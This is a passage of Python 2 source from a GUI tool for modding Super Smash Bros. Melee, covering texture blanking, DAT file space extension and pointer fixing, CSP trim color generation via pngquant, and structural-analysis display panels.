( str(width) + ' x ' + str(height) ), # width and height
'_' + str(newImageType) + ' (' + imageFormats[newImageType] + ')' # the image type and format
)
Gui.datTextureTree.item( iid, values=newValues )
# Replace child mipmap textures if there are any
if mipmapLevel > -1 and generalBoolSettings['cascadeMipmapChanges'].get() and ( width > 1 and height > 1 ):
Gui.root.update() # Updates the GUI, so that the above texture replacement can be seen before moving on to the next texture
status = writeTextureToDat( datFile, imageFilepath, imageDataOffset + origImageDataLength, updateGui, True )[0]
return ( status, '', '' )
def blankTextures( cascadingMipmapChange=False, iidSelectionsTuple=() ):
if not iidSelectionsTuple: iidSelectionsTuple = Gui.datTextureTree.selection()
if len( iidSelectionsTuple ) == 0: msg( 'No textures are selected.' )
else:
for iid in iidSelectionsTuple:
# Collect info on the selected texture.
imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
# Fill the texture data area with zeros.
emptyBytes = bytearray( imageDataLength ) # bytearray intialized with n bytes of 0
globalDatFile.updateData( imageDataOffset, emptyBytes, 'Texture zeroed out' )
# If it's a paletted image, fill the palette data region with zeros as well.
if imageType == 8 or imageType == 9 or imageType == 10:
paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, paletteColorCount = getPaletteInfo( globalDatFile, imageDataOffset )
if paletteDataOffset == -1: continue
emptyPaletteData = '8000' * ( paletteLength / 2 ) # '8000' is two bytes, so the palette length variable is halved
globalDatFile.updateData( paletteDataOffset, bytearray.fromhex(emptyPaletteData), 'Palette zeroed out' )
# Update the palette tab if this is the currently selected texture.
if iid == Gui.datTextureTree.selection()[-1]: populatePaletteTab( int(iid), imageDataLength, imageType )
# Load the texture and a thumbnail image of it into memory
renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=False )
# Remember this change (per initially selected texture(s), but not for lower cascaded mipmap levels)
# if not cascadingMipmapChange:
# # If this is not a DOL file, then add 0x20 bytes to account for a DAT's file header.
# filename = os.path.basename( globalDatFile.path )
# adjustedImageDataOffset = imageDataOffset
# if not filename[-4:].lower() == '.dol': adjustedImageDataOffset += 0x20
# globalDatFile.unsavedChanges.append( 'Texture erased at ' + uHex(adjustedImageDataOffset) + ' in ' + filename + '.' )
# Update subsequent mipmap levels
if generalBoolSettings['cascadeMipmapChanges'].get() and 'mipmap' in Gui.datTextureTree.item( iid, 'tags' ):
# Check if this is the 'parent' mipmap
if Gui.datTextureTree.parent( iid ) == '': # root item; get iid of first child
nextMipmapLevel = Gui.datTextureTree.get_children( iid )[0]
else:
nextMipmapLevel = Gui.datTextureTree.next( iid )
if nextMipmapLevel: # This will be an empty string if this is the last level (1x1)
blankTextures( cascadingMipmapChange=True, iidSelectionsTuple=tuple([nextMipmapLevel]) )
# Update the program status
if not cascadingMipmapChange: # (only want to do this on the initial run of this function)
if len( iidSelectionsTuple ) == 1: updateProgramStatus( 'Texture Blanked' )
else: updateProgramStatus( 'Textures Blanked' )
# def disableTextures(): # Unused
# iidSelectionsTuple = Gui.datTextureTree.selection()
# if len(iidSelectionsTuple) == 0: msg('No textures are selected.')
# else:
# global datData, unsavedDatChanges
# for iid in iidSelectionsTuple:
# # Collect info on the selected texture.
# #imageDataDetails, dimensions, imageType = Gui.datTextureTree.item( iid, 'values' )
# imageDataOffset = int( iid ) #int( imageDataDetails.split()[0], 16 ) - 0x20
# for headerInfo in getImageDataHeaders( datFile, imageDataOffset ): # Gets a list of the headers that point to this texture.
# # Get the offset of the pointer (to the image data header) in the Texture Structure.
# parentPointerOffsets = getParentPointerOffsets( datFile, headerInfo[0] )
# if parentPointerOffsets == []:
# msg( 'No parent structures found!' )
# elif len(parentPointerOffsets) > 1:
# print 'multiple parent pointers found!'
# # #ttk.Label( textureStructureProperties, text='Pointer offsets found in multiple Texture Structures (' + str(len(parentPointerOffsets)) + ' total): ' ).pack(pady=pady)
# # for i in xrange( len(parentPointerOffsets) ):
# # ttk.Label(textureStructureProperties, text=uHex(parentPointerOffsets[i] + 0x20)).pack(pady=pady)
# else: # Only one offset found.
# for parentPointerOffset in parentPointerOffsets:
# # Confirm this is a pointer by checking for it in the RT Table.?
# # Zero out the Texture Struct's pointer to the Image Data Header.
# print 'Image Header Pointer Offset: ' + uHex( parentPointerOffset + 0x20 )
# datData = replaceHex( datData, parentPointerOffset, '00000000')
# globalDatFile.unsavedChanges.append( 'Texture disabled at ' + uHex(imageDataOffset + 0x20) + ' in ' + os.path.basename( globalDatFile.path ) + '.' )
# updateProgramStatus( 'Texture(s) Disabled' )
def extendTextureSpace( offset, diff ): # test args: 0x3BF40, 0xC800 (Closed port texture in MnSlChr, at 0x2F760)
""" This function will expand the data area at the given offset, starting at the first argument. The second argument is the amount
to increase by. All pointers occurring after the sum of the two arguments will be recalculated. Example usage would have the
first argument as the end point of a texture, and the second argument as the amount to increase the space by. """
if diff == 0: return
offset -= 0x20 # To account for the file header, which is not included in datData
datDataBytes = globalDatFile.data
rtDataBytes = globalDatFile.rtData
offsetBytes = toBytes( offset )
headerInfo = globalDatFile.headerInfo
# Update the file header with the new file size and start of the relocation table.
newFileSize = headerInfo['filesize'] + diff
newRtStart = headerInfo['rtStart'] + diff
globalDatFile.headerData[:8] = toBytes( newFileSize ) + toBytes( newRtStart )
# For each entry in the relocation table, update the address it points to, and the value of the pointer there, if they point to locations beyond the extended space.
entriesUpdated = 0
pointersUpdated = 0
for rtByteOffset in xrange( 0, len(rtDataBytes), 4 ):
# If the pointer appears after the change, update its address in the relocation table accordingly.
rtEntryBytes = rtDataBytes[rtByteOffset:rtByteOffset+4]
rtEntryInt = toInt( rtEntryBytes )
if rtEntryBytes >= offsetBytes:
rtDataBytes[rtByteOffset:rtByteOffset+4] = toBytes( rtEntryInt + diff )
entriesUpdated += 1
# If the place that the pointer points to is after the space change, update its value accordingly.
dataPointer = datDataBytes[rtEntryInt:rtEntryInt+4]
if dataPointer >= offsetBytes:
datDataBytes[rtEntryInt:rtEntryInt+4] = toBytes( toInt(dataPointer) + diff )
pointersUpdated += 1
print 'length of defined section:', headerInfo['rtEnd'] - headerInfo['rtStart'], ' lenght of actual section:', len(rtDataBytes)
datDataBytes[headerInfo['rtStart']:headerInfo['rtEnd']] = rtDataBytes # rtData (the global variable isn't later merged. so we need to do this here)
# Update offsets in the root/reference node tables
rootAndRefNodesTable = datDataBytes[headerInfo['rtEnd']:headerInfo['stringTableStart']]
for nodeByteOffset in xrange( 0, len(rootAndRefNodesTable), 8 ): # 8 bytes = 1 table entry
filePointer = rootAndRefNodesTable[nodeByteOffset:nodeByteOffset+4]
if filePointer >= offsetBytes:
newNodePointer = toInt( filePointer ) + diff
if newNodePointer - roundTo32( newNodePointer ) != 0: print 'Warning, root/ref node pointers must be aligned to 0x20 bytes!'
rootAndRefNodesTable[nodeByteOffset:nodeByteOffset+4] = toBytes( newNodePointer )
pointersUpdated += 1
datDataBytes[headerInfo['rtEnd']:headerInfo['stringTableStart']] = rootAndRefNodesTable
if diff < 0: # Remove bytes from the latter section
datDataBytes = datDataBytes[:offset] + datDataBytes[offset+diff:]
else: # Fill the newly extended space with zeros.
datDataBytes = datDataBytes[:offset] + bytearray( diff ) + datDataBytes[offset:]
globalDatFile.data = datDataBytes
globalDatFile.rtData = rtDataBytes
msg('RT Entries updated: ' + str(entriesUpdated) + '\nPointers updated: ' + str(pointersUpdated))
globalDatFile.unsavedChanges.append( uHex(diff) + ' of space added to file at offset ' + uHex(offset + 0x20) + '.' )
updateProgramStatus( 'Space Extension Complete' )
def generateTrimColors( fileIid, autonomousMode=False ):
#tic = time.clock()
# Get the file's data and parse the file for basic info
theDatFile = hsdFiles.datFileObj( source='disc' )
theDatFile.load( fileIid, fileData=getFileDataFromDiscTreeAsBytes( iid=fileIid ) )
hInfo = theDatFile.headerInfo
# Quick failsafe to make sure the file is recognizable, avoiding large processing time
if hInfo['rootNodeCount'] > 300 or hInfo['referenceNodeCount'] > 300 or hInfo['rtEntryCount'] > 45000 or len( theDatFile.rtData ) > 200000:
msg( 'The file structure of ' + fileIid + ' could not be analyzed for trim color generation.' )
return
updateProgramStatus( 'Generating CSP Trim Colors....' )
Gui.programStatusLabel.update()
# Collect the textures in the file
textures = {} # keys: imageDataOffset, values: pil images
totalWidth = 0
totalHeight = 0
for imageDataOffset, imageHeaderOffset, _, _, width, height, imageType, _ in identifyTextures( theDatFile ):
# Skip this texture if it's a shading layer, by checking the flags of the Texture Struct that this texture is attached to
imageDataHeader = theDatFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset )
if not imageDataHeader: continue
for headerParentOffset in imageDataHeader.getParents():
# Test for a Texture Struct
textureStruct = theDatFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )
if textureStruct: break
else: continue # Above loop didn't break; no texture struct found (must be part of an animation such as an eye)
if textureStruct.getValues( 'GXTexGenSrc' ) != 4: # Checking layer flags
#print 'Skipping texture', uHex( 0x20+imageDataOffset ), 'for trim color generation, as it appears to be a shading layer'
continue
try:
imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
imageData = theDatFile.getData( imageDataOffset, imageDataLength )
# Skip this texture if its data has been "blanked"
if not any( imageData ): continue
if imageType == 8 or imageType == 9 or imageType == 10:
paletteData, paletteType = getPaletteData( theDatFile, imageDataOffset )
else:
paletteData = ''
paletteType = None
# Decode the texture data
newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
newImg.deblockify() # This decodes the image data, to create an rgbaPixelArray.
textures[imageDataOffset] = Image.new( 'RGBA', (width, height) )
textures[imageDataOffset].putdata( newImg.rgbaPixelArray )
# Update the cumulative dimensions of the new super image
if width > totalWidth:
totalWidth = width
totalHeight += height
except:
print 'Failed to decode texture at', uHex(0x20+imageDataOffset), 'for trim color generation'
# Combine the images collected above into one super image
yOffset = 0
superImage = Image.new( 'RGBA', (totalWidth, totalHeight) )
for texture in textures.values():
superImage.paste( texture, (0, yOffset) )
yOffset += texture.size[1]
# Save the image data to a memory buffer so it can be sent to the color quantizer without creating a file.
superImageBuffer = StringIO()
superImage.save( superImageBuffer, 'png' )
# Create a palette for the super image
exitCode, outputStream = cmdChannel( '"' + pathToPngquant + '" --speed 3 13 - ', standardInput=superImageBuffer.getvalue() )
superImageBuffer.close()
if exitCode != 0:
print 'Error while generating super image palette; exit code:', exitCode
print outputStream
msg( 'There was an error during color generation. Error code: '+str(exitCode) + '\n\nDetails:\n' + outputStream, 'Error Generating CSP Trim Colors.' )
updateProgramStatus( 'Error Generating CSP Trim Colors.' )
return
# Get the palette generated for the super image
palettedFileBuffer = StringIO( outputStream )
pngImage = png.Reader( palettedFileBuffer )
pngImage.read() # Needed for pulling the palette; its return value might be useful to print
generatedPalette = pngImage.palette( alpha='force' )
palettedFileBuffer.close()
# Filter out the palette entry relating to the extra empty space in the super image (alpha of 0)
generatedPalette = [ entry for entry in generatedPalette if entry[3] != 0 ]
baseColor = generatedPalette[0]
# Get a value to determine whether the base color is light or dark (value/brightness)
baseColorValue = rgb2hsv( baseColor )[2]
# Convert the colors to HSV format (excluding the base color)
hsvList = [ rgb2hsv(color) for color in generatedPalette[1:] ]
# Go through the colors and look for the highest combination of luminance and saturation in order to pick an accent color
highestSatLum = 0
highestSatLumColorIndex = 0
for i, color in enumerate( hsvList ):
_, saturation, value = color # first value is hue
if baseColorValue >= .5: # Place higher weight on darker colors (values) instead
satLum = saturation + 1 - value
else: satLum = saturation + value
if satLum > highestSatLum:
highestSatLum = satLum
highestSatLumColorIndex = i
accentColor = generatedPalette[1:][highestSatLumColorIndex]
filename = os.path.basename( fileIid )
if autonomousMode:
updateTrimColors( filename, colors=(rgb2hex(baseColor).replace('#', ''), rgb2hex(accentColor).replace('#', '')) )
else: # Show the user some options for the accent color, and let them decide whether to add these colors to their game.
updateProgramStatus( 'CSP Trim Colors Generated' )
showColorSwatches( colors=generatedPalette, chosenColors=(baseColor, accentColor), filename=filename )
def updateTrimColors( filename, colors=() ):
tableOffset = 0x3a3c90
characterTableOffsets = { # First value is the start of that character's section (to the character name), relative to the start of the table
'ca': ( 0, 'gy', 're', 'wh', 'gr', 'bu' ), # Falcon
'dk': ( 0x70, 'bk', 're', 'bu', 'gr' ), # DK
'fx': ( 0xD0, 'or', 'la', 'gr' ), # Fox
'kb': ( 0x170, 'ye', 'bu', 're', 'gr', 'wh' ), # Kirby
'kp': ( 0x1E0, 're', 'bu', 'bk' ), # Bowser
'lk': ( 0x230, 're', 'bu', 'bk', 'wh' ), # Link
'lg': ( 0x290, 'wh', 'bu', 'pi' ), # Luigi
'mr': ( 0x2E0, 'ye', 'bk', 'bu', 'gr' ), # Mario
'ms': ( 0x340, 're', 'gr', 'bk', 'wh' ), # Marth
'mt': ( 0x3A0, 're', 'bu', 'gr' ), # Mewtwo
'ns': ( 0x3F0, 'ye', 'bu', 'gr' ), # Ness
'pe': ( 0x440, 'ye', 'wh', 'bu', 'gr' ), # Peach
'pk': ( 0x4A0, 're', 'bu', 'gr' ), # Pika
'nn': ( 0x4F0, 'ye', 'aq', 'wh' ), # Nana (updating either IC changes the colors for both)
'pp': ( 0x4F0, 'gr', 'or', 're' ), # Popo
'pr': ( 0x540, 're', 'bu', 'gr', 'ye' ), # Jiggs
'ss': ( 0x5A0, 'pi', 'bk', 'gr', 'la' ), # Samus
'ys': ( 0x600, 're', 'bu', 'ye', 'pi', 'aq' ), # Yoshi
'sk': ( 0x670, 're', 'bu', 'gr', 'wh' ), # Sheik (updating either Sheik/Zelda changes the colors for both)
'zd': ( 0x670, 're', 'bu', 'gr', 'wh' ), # Zelda
'fc': ( 0x6D0, 're', 'bu', 'gr' ), # Falco
'cl': ( 0x720, 're', 'bu', 'wh', 'bk' ), # Y. Link
'dr': ( 0x780, 're', 'bu', 'gr', 'bk' ), # Dr. Mario
'fe': ( 0x7E0, 're', 'bu', 'gr', 'ye' ), # Roy
'pc': ( 0x840, 're', 'bu', 'gr' ), # Pichu
'gn': ( 0x890, 're', 'bu', 'gr', 'la' ), # Ganon
'bo': ( 0x8F0, ), # M. Wireframe
'gl': ( 0x910, ), # F. Wireframe
'gk': ( 0x930, ) # Giga Bowser
}
# Parse the filename and make sure table location information for it is available
char = filename[2:4]
color = filename[4:6]
if char not in characterTableOffsets or ( color not in characterTableOffsets[char] and color != 'nr' and color != 'rl' and color != 'rr' ): # Last two are for Falcon's Red alt
print 'Unable to process CSP trim colors for', filename, 'due to an invalid filename.'
return False
# Calculate the offset of the color to be changed
if color == 'nr': rowNumber = 1
elif len( characterTableOffsets[char] ) == 1: rowNumber = 1 # These characters only have one set of alts
elif color == 'rl' or color == 'rr': rowNumber = 3 # Both are Falcon's red costume
else:
for i, colorCode in enumerate( characterTableOffsets[char] ):
if color == colorCode:
rowNumber = i + 1 # +1 accounts for the missing 'nr' (for the Neutral costume) in the tuple
break
else: # loop above didn't break; coloCode not found (shouldn't happen due to previous validation)
print 'Unable to process CSP trim colors for', filename, 'due to an invalid filename.'
return False
fileOffset = tableOffset + characterTableOffsets[char][0] + rowNumber * 0x10
if filename[-4:] == '.rat': fileOffset += 8
elif filename[-4:] == '.usd' and color == 'rr': fileOffset += 8 # For Falcon's Red Right alt
print 'CSP Trim colors generated for', filename + ':', colors, '| Being placed at offset:', uHex(fileOffset)
# Validate the colors
if len( colors[0] ) != 6 or not validHex( colors[0] ):
print 'Invalid Base Color value.'
return False
elif len( colors[1] ) != 6 or not validHex( colors[1] ):
print 'Invalid Accent Color value.'
return False
# Find the CSS file iid
postV407 = False # Refers to the version of 20XXHP (versions later than 4.06 use .0sd & .1sd rather than .usd)
cssIid = scanDiscForFile( 'MnSlChr.u' )
if not cssIid:
cssIid = scanDiscForFile( 'MnSlChr.0' )
if cssIid: postV407 = True
if not cssIid:
print 'Unable to find the CSS file in the disc.'
return False
# Get the CSS's file information and data
description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( cssIid, 'values' )
cssData = getFileDataFromDiscTree( iidValues=(entity, isoOffset, fileSize, source, data) )
if not cssData: return False
# Replace the color data at the specified offset
cssData = replaceHex( cssData, fileOffset, colors[0] )
cssData = replaceHex( cssData, fileOffset + 4, colors[1] )
Gui.isoFileTree.item( cssIid, values=('CSP Trim Colors Updated', entity, isoOffset, fileSize, isoPath, 'ram', cssData), tags='changed' )
global unsavedDiscChanges
updateString = isoPath.split('/')[-1] + ' updated with new CSP Trim colors.'
if not updateString in unsavedDiscChanges: unsavedDiscChanges.append( updateString )
# Update the second CSS file as well if this is 20XXHP v2.07+
if postV407:
nextCssIid = scanDiscForFile( 'MnSlChr.1' )
# Get the CSS's file information and data
description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( nextCssIid, 'values' )
cssData = getFileDataFromDiscTree( iidValues=(entity, isoOffset, fileSize, source, data) )
if not cssData: return False
# Replace the color data at the specified offset
cssData = replaceHex( cssData, fileOffset, colors[0] )
cssData = replaceHex( cssData, fileOffset + 4, colors[1] )
Gui.isoFileTree.item( nextCssIid, values=('CSP Trim Colors Updated', entity, isoOffset, fileSize, isoPath, 'ram', cssData), tags='changed' )
updateString = isoPath.split('/')[-1] + ' updated with new CSP Trim colors.'
if not updateString in unsavedDiscChanges: unsavedDiscChanges.append( updateString )
updateProgramStatus( 'CSP Trim Colors Updated' )
class showColorSwatches( object ):
""" Creates a non-modal window to present the user with options on pre-generated colors
generated for a character's CSP trim colors (for left/right alt costumes). """
window = None
def __init__( self, colors=[], chosenColors=(), filename='' ):
self.colors = colors
self.chosenColors = chosenColors
self.filename = filename
if showColorSwatches.window: showColorSwatches.window.destroy()
self.showWindow()
def showWindow( self ):
# Define the window.
showColorSwatches.window = Tk.Toplevel( Gui.root )
showColorSwatches.window.title( 'CSP Trim Color Generator' )
showColorSwatches.window.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.
showColorSwatches.window.resizable( width=True, height=True )
#self.window.wm_attributes('-topmost', 1) # Makes the window always on top
showColorSwatches.window.protocol( 'WM_DELETE_WINDOW', self.close ) # Overrides the 'X' close button.
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
showColorSwatches.window.geometry( '+' + str(rootDistanceFromScreenLeft + 180) + '+' + str(rootDistanceFromScreenTop + 180) )
# Populate the window
self.mainFrame = Tk.Frame( showColorSwatches.window )
# Show the generated palette colors
if self.colors:
def onColorClick( event ):
widget = event.widget.find_closest(event.x, event.y)
targetColor = self.colorsCanvas.itemcget( widget, 'fill' ).replace('#', '')
self.color2Swatch['bg'] = '#' + targetColor
self.color2Entry.delete( 0, 'end' )
self.color2Entry.insert( 'end', targetColor + '00' )
ttk.Label( self.mainFrame, wraplength=230, text='These are the colors generated for "' + self.filename + '". The Base Color should be the most prominent color '
'for the costume. But you might try tweaking the Accent Color below.' ).pack( padx=16, pady=4 )
self.colorsCanvas = Tk.Canvas( self.mainFrame, borderwidth=2, relief='ridge', background='white', width=197, height=19 )
self.colorsCanvas.pack( pady=4 )
x = 10
y = 10
for colorTuple in self.colors: # For each palette entry....
colorHex = rgb2hex( colorTuple )
self.colorsCanvas.create_rectangle( x, y, x + 8, y+8, width=1, fill=colorHex, tags='entries' )
x += 16
self.colorsCanvas.tag_bind( 'entries', '<1>', onColorClick )
def onMouseEnter(e): self.colorsCanvas['cursor']='hand2'
def onMouseLeave(e): self.colorsCanvas['cursor']=''
self.colorsCanvas.tag_bind( 'entries', '<Enter>', onMouseEnter )
self.colorsCanvas.tag_bind( 'entries', '<Leave>', onMouseLeave )
chosenColorsFrame = Tk.Frame( self.mainFrame )
baseColor = rgb2hex( self.chosenColors[0] )
accentColor = rgb2hex( self.chosenColors[1] )
# Color 1 / Base Color
ttk.Label( chosenColorsFrame, text='Base Color' ).grid( column=0, row=0, padx=8, pady=3 )
self.color1Swatch = Tk.Frame( chosenColorsFrame, bg=baseColor, width=60, height=25 )
self.color1Swatch.grid( column=0, row=1, padx=8, pady=3 )
self.color1Swatch.grid_propagate( False )
self.color1Entry = ttk.Entry( chosenColorsFrame, text=baseColor + '00', width=9 )
self.color1Entry.delete( 0, 'end' )
self.color1Entry.insert( 'end', baseColor.replace('#', '') + '00' )
self.color1Entry.grid( column=0, row=2, padx=8, pady=3 )
# Color 2 / Accent Color
ttk.Label( chosenColorsFrame, text='Accent Color' ).grid( column=1, row=0, padx=8, pady=3 )
self.color2Swatch = Tk.Frame( chosenColorsFrame, bg=accentColor, width=60, height=25 )
self.color2Swatch.grid( column=1, row=1, padx=8, pady=3 )
self.color2Swatch.grid_propagate( False )
self.color2Entry = ttk.Entry( chosenColorsFrame, text=accentColor + '00', width=9 )
self.color2Entry.delete( 0, 'end' )
self.color2Entry.insert( 'end', accentColor.replace('#', '') + '00' )
self.color2Entry.grid( column=1, row=2, padx=8, pady=3 )
chosenColorsFrame.pack( pady=3 )
ttk.Button( self.mainFrame, text='Update in Game (MnSlChr Table)', command=self.sendTrimColors ).pack( ipadx=10, pady=7 )
self.mainFrame.pack( fill='both', expand=1 )
def sendTrimColors( self ):
baseColor = self.color1Entry.get()[:6].replace('#', '')
accentColor = self.color2Entry.get()[:6].replace('#', '')
updateTrimColors( self.filename, colors=(baseColor, accentColor) )
self.close()
def close( self ):
showColorSwatches.window.destroy()
showColorSwatches.window = None
#=================================#
# ~ ~ Structural Analysis tab ~ ~ #
#=================================#
def getTreeviewDepth( treeviewWidget, iid ):
depth = 0
while 1:
parent = treeviewWidget.parent( iid )
if not parent: break
iid = parent
depth += 1
return depth
def getStructureIids( targetOffsets ):
""" Finds all instances of a structure or list of structures in the treeview (those that end with the target offsets). """
parentIids = []
for iid in Gui.fileStructureTree.allIids:
if int( iid.split( '/' )[-1] ) in targetOffsets: parentIids.append( iid )
return tuple( parentIids )
def adjustSavColumnWidth( treeItem, currentViewingWidth=None ):
""" Expands the width of the Structural Analysis Tree's structure name column,
if the given treeview item is estimated to require more space. """
# Check the current amount of space available, and the estimated space needed for the new item
if not currentViewingWidth:
currentViewingWidth = Gui.fileStructureTree.column( '#0', 'width' ) # Excludes the Offset column
newStructureIndentation = 20 * getTreeviewDepth( Gui.fileStructureTree, treeItem ) + 20 # From the left-side of the treeview
structureTextLength = len( Gui.fileStructureTree.item(treeItem, 'text') ) * 7 # Assuming ~7px per character; todo: make dynamic for scaling
requiredWidth = 5 + newStructureIndentation + structureTextLength + 7 # 5 and 7 are to account for before/after the '+' sign, respectively
# Expand the size of the treeview column, if more space is needed
if requiredWidth > currentViewingWidth: # Expand the column width, and scroll all the way to the right
Gui.fileStructureTree.column( '#0', width=requiredWidth )
Gui.fileStructureTree.update() # Need the GUI to update the widget's new width
Gui.fileStructureTree.xview_moveto( 1 )
def addHelpBtn( helpText ):
helpLabel = ttk.Label( Gui.structurePropertiesFrame.interior, text='?', foreground='#445', cursor='hand2' )
helpLabel.place( relx=1, x=-17, y=4 )
helpLabel.bind( '<1>', lambda e, message=helpText: msg(message, 'Good to Know') )
def showFileProperties():
# Set the top-most file name label
ttk.Label( Gui.structurePropertiesFrame.interior, text=globalDatFile.fileName, font="-weight bold" ).pack( pady=12 )
# Add a help button
helpText = ( '"Total Structures" counts structures in the data section of the file, as well as 4 to 5 other basic DAT file structures, '
'which are: the file header, relocation table, string table, and the root/reference node tables.' )
addHelpBtn( helpText )
# Add file details; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
# Construct the strings to be displayed
fileSizeText = 'File Size: 0x{0:X} ({0:,} bytes)'.format( globalDatFile.headerInfo['filesize'] )
pointersCountText = 'Total Pointers: {:,}'.format( len(globalDatFile.pointerOffsets) )
structCountText = 'Total Structures: {:,}'.format( len(globalDatFile.structureOffsets) )
rootNodesText = 'Root Nodes: {:,}'.format( len(globalDatFile.rootNodes) )
refNodesText = 'Reference Nodes: {:,}'.format( len(globalDatFile.referenceNodes) )
# Add the above stings to the GUI using a table grid
ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
ttk.Label( basicDetailsFrame, text=pointersCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, sticky='w', padx=11, pady=(4,0) )
ttk.Label( basicDetailsFrame, text=structCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, sticky='w', padx=11 )
ttk.Label( basicDetailsFrame, text=rootNodesText, wraplength=Gui.structPropFrameWrapLength ).grid( column=1, row=1, sticky='w', padx=11 )
ttk.Label( basicDetailsFrame, text=refNodesText, wraplength=Gui.structPropFrameWrapLength ).grid( column=1, row=2, sticky='w', padx=11 )
basicDetailsFrame.pack( pady=0 )
# Add file operation buttons
buttonFrame = ttk.Frame( Gui.structurePropertiesFrame.interior )
buttonFrame.pack( pady=(12, 0) ) # Need to attach this before performing a deep dive
ttk.Button( buttonFrame, text='View Hex', command=viewDatFileHex ).pack( side='left', padx=10 )
if globalDatFile.deepDiveStats:
ttk.Button( buttonFrame, text='Deep Dive', command=performDeepDive, state='disabled' ).pack( side='left', padx=10 )
performDeepDive() # In this case, this'll skip the actual dive process and just display the data
else:
ttk.Button( buttonFrame, text='Deep Dive', command=performDeepDive ).pack( side='left', padx=10 )
def showRelocationTableInfo():
# Set the top-most file structure name label
ttk.Label( Gui.structurePropertiesFrame.interior, text='Relocation Table', font="-weight bold" ).pack( pady=12 )
# Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
# Construct the strings to be displayed
locationText = 'Location: 0x{:X} - 0x{:X}'.format( 0x20+globalDatFile.headerInfo['rtStart'], 0x20+globalDatFile.headerInfo['rtEnd'] )
fileSizeText = 'Size: 0x{0:X} ({0:,} bytes)'.format( globalDatFile.headerInfo['rtEnd'] - globalDatFile.headerInfo['rtStart'] )
entriesCountText = 'Total Entries: {:,}'.format( globalDatFile.headerInfo['rtEntryCount'] )
# Add the above stings to the GUI using a table grid
ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
ttk.Label( basicDetailsFrame, text=entriesCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, columnspan=2 )
basicDetailsFrame.pack( pady=0 )
def showNodeTableInfo( name ): # For root and reference node tables
if name.startswith( 'Root' ):
totalEntries = globalDatFile.headerInfo['rootNodeCount']
rootStructCount = len( globalDatFile.rootStructNodes )
labelCount = len( globalDatFile.rootLabelNodes )
start = 0x20 + globalDatFile.headerInfo['rtEnd']
end = 0x20 + globalDatFile.headerInfo['rootNodesEnd']
nodeDetails = [ '\tNode ' + str(i+1) + ', @ ' + uHex(node[0] + 0x20) + ' - - ' + node[1] for i, node in enumerate( globalDatFile.rootNodes ) ]
else: # The reference nodes table
totalEntries = globalDatFile.headerInfo['referenceNodeCount']
rootStructCount = len( globalDatFile.refStructNodes )
labelCount = len( globalDatFile.refLabelNodes )
start = 0x20 + globalDatFile.headerInfo['rootNodesEnd']
end = 0x20 + globalDatFile.headerInfo['stringTableStart']
nodeDetails = [ '\tNode ' + str(i+1) + ', @ ' + uHex(node[0] + 0x20) + ' - - ' + node[1] for i, node in enumerate( globalDatFile.referenceNodes ) ]
# Add the title
ttk.Label( Gui.structurePropertiesFrame.interior, text=name, font="-weight bold" ).pack( pady=(12, 0) )
# Add basic info
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
basicInfo = 'Location: 0x{:X} - 0x{:X}\nTotal Entries: {}\n\nRoot Structures: {}\nLabels: {}'.format( start, end, totalEntries, rootStructCount, labelCount )
ttk.Label( basicDetailsFrame, text=basicInfo, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
basicDetailsFrame.pack()
# Add the label/button to show all nodes info
nodeName = name.split()[0]
def displayNodeInfo( event ): cmsg( '\n'.join(nodeDetails), title=nodeName + ' Table Nodes', align='left' )
label = ttk.Label( Gui.structurePropertiesFrame.interior, text='View Nodes', wraplength=Gui.structPropFrameWrapLength, cursor='hand2', foreground='#00F' )
label.bind( '<1>', displayNodeInfo )
label.pack( pady=(12, 0) )
def showStringTableInfo():
# Gather data and build a few strings for the GUI
stringTableSize = globalDatFile.getStringTableSize()
stringTableEnd = 0x20 + globalDatFile.headerInfo['stringTableStart'] + stringTableSize
locationText = 'Location: 0x{:X} - 0x{:X}'.format( 0x20+globalDatFile.headerInfo['stringTableStart'], stringTableEnd )
fileSizeText = 'Size: 0x{0:X} ({0:,} bytes)'.format( stringTableSize )
entriesCountText = 'Total Entries: {}'.format( len(globalDatFile.rootNodes) + len(globalDatFile.referenceNodes) )
# Check if there's any data beyond the reported end of the file
totalFileSize = 0x20 + globalDatFile.headerInfo['stringTableStart'] + stringTableSize
if totalFileSize == globalDatFile.headerInfo['filesize']:
locationText += ' (file end)'
ttk.Label( Gui.structurePropertiesFrame.interior, text='String Table', font="-weight bold" ).pack( pady=12 )
# Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
